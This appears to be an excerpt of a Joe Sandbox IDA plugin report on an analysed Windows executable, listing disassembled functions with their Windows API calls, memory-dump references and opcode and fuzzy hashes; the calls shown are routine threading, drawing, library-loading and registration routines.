                                                                                      Function 00C7E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C7E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00C7E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C7E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C7E24D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: df03e39e71391a12fcb1e50cd7e29230fb3d258fadb246641a7ea3808403ca58
                                                                                      • Instruction ID: cbc07bc6691a5328735b001323400aac0395463f26ccec592543d149efa3a5f8
                                                                                      • Opcode Fuzzy Hash: df03e39e71391a12fcb1e50cd7e29230fb3d258fadb246641a7ea3808403ca58
                                                                                      • Instruction Fuzzy Hash: B411DB76A04258BBC7019FA89C49BDF7FAD9B45324F148255F929D7291D670CE0487A0
                                                                                      Function 00C3D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,?,00C3CFF9,00000000,00000004,00000000), ref: 00C3D218
                                                                                      • GetLastError.KERNEL32 ref: 00C3D224
                                                                                      • __dosmaperr.LIBCMT ref: 00C3D22B
                                                                                      • ResumeThread.KERNEL32(00000000), ref: 00C3D249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 173952441-0
                                                                                      • Opcode ID: d23917b1d61295f8aaf363ef021270cbffb0bb7a592a21814d5d14185329e032
                                                                                      • Instruction ID: b959118ee4db5718603a897211dc6d413b03ab367672c10380d8451c6f93117f
                                                                                      • Opcode Fuzzy Hash: d23917b1d61295f8aaf363ef021270cbffb0bb7a592a21814d5d14185329e032
                                                                                      • Instruction Fuzzy Hash: C601F976825104BBCB115BA6EC45BAF7A6DDF82731F100219F936921D0CF72CD01D7A0
                                                                                      Function 00C1600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C16060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 535bddd5a0b0fd4c84b27ddfb899b0cc6f5b9194249d331a68f4e02c35e21ea0
                                                                                      • Instruction ID: db94eb2746635087707f027d907d1bb99daabacde9cdfb2a2ea40a8686e45d83
                                                                                      • Opcode Fuzzy Hash: 535bddd5a0b0fd4c84b27ddfb899b0cc6f5b9194249d331a68f4e02c35e21ea0
                                                                                      • Instruction Fuzzy Hash: 55115E72501548BFEF128F949C84BEEBF69EF0E358F040115FA1452110DB329DA0EB94
                                                                                      Function 00C33B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00C33B56
                                                                                        • Part of subcall function 00C33AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00C33AD2
                                                                                        • Part of subcall function 00C33AA3: ___AdjustPointer.LIBCMT ref: 00C33AED
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00C33B6B
                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00C33B7C
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00C33BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 737400349-0
                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction ID: 22a1d1d0223eb439dab6f8f5905e4b12e6dcb7cab1c021a52640b76a3cb47196
                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction Fuzzy Hash: 89010C32110189BBDF125E95CC46EEB7F6EEF58758F044014FE58A6121C736E961EBA0
                                                                                      Function 00C43073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C113C6,00000000,00000000,?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue), ref: 00C430A5
                                                                                      • GetLastError.KERNEL32(?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue,00CB2290,FlsSetValue,00000000,00000364,?,00C42E46), ref: 00C430B1
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue,00CB2290,FlsSetValue,00000000), ref: 00C430BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: 11ee30c961c4d6f40ae4fe3faddda55f604a67f71b85d965e0743be3c2e89c81
                                                                                      • Instruction ID: bf285a1538bcf2f727004d714edd62d1098f8657bf511b58bcced57277cfb8ec
                                                                                      • Opcode Fuzzy Hash: 11ee30c961c4d6f40ae4fe3faddda55f604a67f71b85d965e0743be3c2e89c81
                                                                                      • Instruction Fuzzy Hash: 7001DB32701262ABCB314BB99C85B5B7B98BF86B65B210720F915E7190D721DA01C6E0
                                                                                      Function 00C77464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C7747F
                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C77497
                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C774AC
                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C774CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 1352324309-0
                                                                                      • Opcode ID: 4fa009b6f48a5d67b8dd8f2c76c6893c1b170531c46c893c731fed78030e7f35
                                                                                      • Instruction ID: 036a6287b92f0908c73d6b502b18d51ccb52de491d41d8f73ebc5d326dba3033
                                                                                      • Opcode Fuzzy Hash: 4fa009b6f48a5d67b8dd8f2c76c6893c1b170531c46c893c731fed78030e7f35
                                                                                      • Instruction Fuzzy Hash: 6C11ADB1209318ABE7208F24DC49FA67FFCEB04B04F10C669A62AD7191D7B0E944DF60
                                                                                      Function 00C7B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0C4
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0E9
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0F3
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                      • String ID:
                                                                                      • API String ID: 2875609808-0
                                                                                      • Opcode ID: c12b6fc05514562dc931264e18115f1b358979a7ad4be7d0fa43f50803e29de7
                                                                                      • Instruction ID: bdc75c45712d34054b625502ed01411a3f154cc00de1774be5b39e2970d3ca01
                                                                                      • Opcode Fuzzy Hash: c12b6fc05514562dc931264e18115f1b358979a7ad4be7d0fa43f50803e29de7
                                                                                      • Instruction Fuzzy Hash: 5E113971E01929E7CF00AFA5E9A97EEBB78FF0A711F508086D955B2181CB305A518B51
                                                                                      Function 00C72DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C72DC5
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C72DD6
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C72DDD
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C72DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2710830443-0
                                                                                      • Opcode ID: c196448d35d58c6c14ec23f4d6425fb99dd31f281db65120e66bc119adbc0dab
                                                                                      • Instruction ID: 0e8b8f84880b4bd9f690755f305473d3dca5a9d2a6762652272abfc5a098b968
                                                                                      • Opcode Fuzzy Hash: c196448d35d58c6c14ec23f4d6425fb99dd31f281db65120e66bc119adbc0dab
                                                                                      • Instruction Fuzzy Hash: FBE01271601224BBD7305B739C8EFEF7E6CEF57BA5F404115F609D20909AA5C941C6B0
                                                                                      Function 00CA8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296A2
                                                                                        • Part of subcall function 00C29639: BeginPath.GDI32(?), ref: 00C296B9
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CA8887
                                                                                      • LineTo.GDI32(?,?,?), ref: 00CA8894
                                                                                      • EndPath.GDI32(?), ref: 00CA88A4
                                                                                      • StrokePath.GDI32(?), ref: 00CA88B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      • Opcode ID: 5653209a8b017fb74e96fcab77559de120307e8b6675914f81b216959ee7fb5d
                                                                                      • Instruction ID: d7c644b41729359c36b0c9349b4911c4ba2393d193c2aae6d53d9489f28d242c
                                                                                      • Opcode Fuzzy Hash: 5653209a8b017fb74e96fcab77559de120307e8b6675914f81b216959ee7fb5d
                                                                                      • Instruction Fuzzy Hash: 1CF03A36045259BBDB125F94AC4DFCE3A69AF06714F448000FA11660E2CB795621DBA9
                                                                                      Function 00C298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 00C298CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 00C298D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00C298E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 00C298F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      • Opcode ID: 56fccaedb3c929e5adeab25d5aa35d4590da73fd56487708e1424a00fb7f07ae
                                                                                      • Instruction ID: ff7851e82e61b56a7fe2f12251922552047c89bcc066824ead11c24397771e9b
                                                                                      • Opcode Fuzzy Hash: 56fccaedb3c929e5adeab25d5aa35d4590da73fd56487708e1424a00fb7f07ae
                                                                                      • Instruction Fuzzy Hash: 29E06D31244280AADB215B74BC49BEC3F60EB1333AF048719F7FA590E1C77246809B10
                                                                                      Function 00C7162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00C71634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C711D9), ref: 00C7163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C711D9), ref: 00C71648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C711D9), ref: 00C7164F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      • Opcode ID: 911fb21e15d4ded294811b8dbac367c14bb883d71d46b526b365be2d3556e927
                                                                                      • Instruction ID: 81706ba852b423ad8086d2562c72fbdf9bd3f738ebd3e7361770850c529bb06d
                                                                                      • Opcode Fuzzy Hash: 911fb21e15d4ded294811b8dbac367c14bb883d71d46b526b365be2d3556e927
                                                                                      • Instruction Fuzzy Hash: 6AE08631602211DBD7201FA49D4DB8B3B7CEF46795F188808F655CA090D6344540C750
                                                                                      Function 00C6D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00C6D858
                                                                                      • GetDC.USER32(00000000), ref: 00C6D862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6D882
                                                                                      • ReleaseDC.USER32(?), ref: 00C6D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 2d6df768dd555a2cd7ced0b0c90e4d3393162a605f171fd40dc3d672dd461daa
                                                                                      • Instruction ID: a9f844dd82541a9296a236c59cb3687de1dcfd39fcfe4cd9dcea4594e6d17117
                                                                                      • Opcode Fuzzy Hash: 2d6df768dd555a2cd7ced0b0c90e4d3393162a605f171fd40dc3d672dd461daa
                                                                                      • Instruction Fuzzy Hash: FEE01AB0800204DFCB419FA5D88C76DBBB1FB09314F108009F816E7350CB388941AF40
                                                                                      Function 00C6D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00C6D86C
                                                                                      • GetDC.USER32(00000000), ref: 00C6D876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6D882
                                                                                      • ReleaseDC.USER32(?), ref: 00C6D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 31f5494e7346bfdd36a73a096d7e0ca49b56139d33e57dded313e0d645453658
                                                                                      • Instruction ID: 67f3087fafa87b75a1094aaa9d209e4b5ec4dada22d5278db787f1c1c100bf94
                                                                                      • Opcode Fuzzy Hash: 31f5494e7346bfdd36a73a096d7e0ca49b56139d33e57dded313e0d645453658
                                                                                      • Instruction Fuzzy Hash: BFE092B5800204EFCB51AFA5D88876EBBB5BB09315B148449F95AE7360CB389942AF50
                                                                                      Function 00C84D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C84ED4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection_wcslen
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1725874428-3443410124
                                                                                      • Opcode ID: 00e9951516f4bd668408c1d6e3a923cc872f913bcfe1722af4dd21626c2ef588
                                                                                      • Instruction ID: d15950b8a9921f2cddabe309642715cb9c620e5761f6923d62b009d5c9b75bd9
                                                                                      • Opcode Fuzzy Hash: 00e9951516f4bd668408c1d6e3a923cc872f913bcfe1722af4dd21626c2ef588
                                                                                      • Instruction Fuzzy Hash: 08919275A002059FCB18EF98C484EAABBF1BF45308F15809DE51A9F362C731EE85DB94
                                                                                      Function 00C3E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00C3E30D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
